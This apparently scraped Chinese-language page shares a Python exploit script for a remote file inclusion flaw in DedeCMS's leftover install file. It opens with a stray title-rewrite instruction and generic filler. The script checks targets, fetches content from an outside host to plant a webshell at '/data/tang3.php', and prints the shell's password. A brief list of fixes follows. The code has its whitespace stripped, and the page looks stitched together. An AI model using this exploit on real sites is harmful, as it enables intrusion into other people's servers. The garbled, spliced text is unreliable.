将标题改写为:最新Python远程执行脚本在织梦DedeCMS中的应用
Python是一种广泛使用的高级编程语言,可以用于多种用途,包括网络爬虫、数据分析和网站开发等。织梦DedeCMS是一款流行的内容管理系统(CMS),它使用PHP编写,并提供了丰富的功能和插件。远程执行脚本是指在服务器上运行的脚本,它可以访问服务器上的资源并执行任务。在Python中,可以使用requests库来发送HTTP请求,从而实现对织梦DedeCMS的远程执行脚本。例如,可以使用requests库来获取织梦DedeCMS的文章列表,或者上传文件到服务器上。
织梦CMS是使用最多的CMS之 一,但是漏洞也非常多。分享一款python写的织梦远程文件包含漏洞。修复此漏洞方法,请见文章底部。
织梦CMS漏洞代码
#!/usr/bin/envpython#coding=utf-8#Joseph(小续)importrequestsimportsysimportredefmain():try:url="http://"+sys.argv[1].strip('http://')exceptIndexError:print'''poc:dede.py[url]http://www.baidu.com/[/url]'''payload="/install/index.php.bak?step=11&insLockfile=a&s_lang=a&install_demo_name=../data/admin/config_update.php"urlpoc=url+payloadcode=requests.get(urlpoc).status_codeifcode==200:printu"恭喜存在此漏洞"printu"Ongoingattacks--->>>>>"exploit(url)passelse:printu"sorry漏洞正在挣扎"passdefexploit(url):urlpoc=url+"/install/index.php.bak?step=11&insLockfile=a&s_lang=a&install_demo_name=../data/tang3.php&updateHost=https://www.tuiedu.org/"htmlcontent=requests.get(urlpoc).contentProbe=re.compile(r'存在')ifProbe.findall(htmlcontent):printu'''ver:getshell成功shell:url+/data/tang3.php?a=0密码为:c'''passelse:printu"请看远程地址是否已经不可用"passif__name__=='__main__':main()修复方法
1、建议安装完成后,删除(改名)install文件夹。
2、给data文件夹改名,或者移动位置。
3、到织梦后台,升级到最新的版本
4、官方网站下载最新补丁包手动更新到最新版本。
5、不用谢!
相关专题
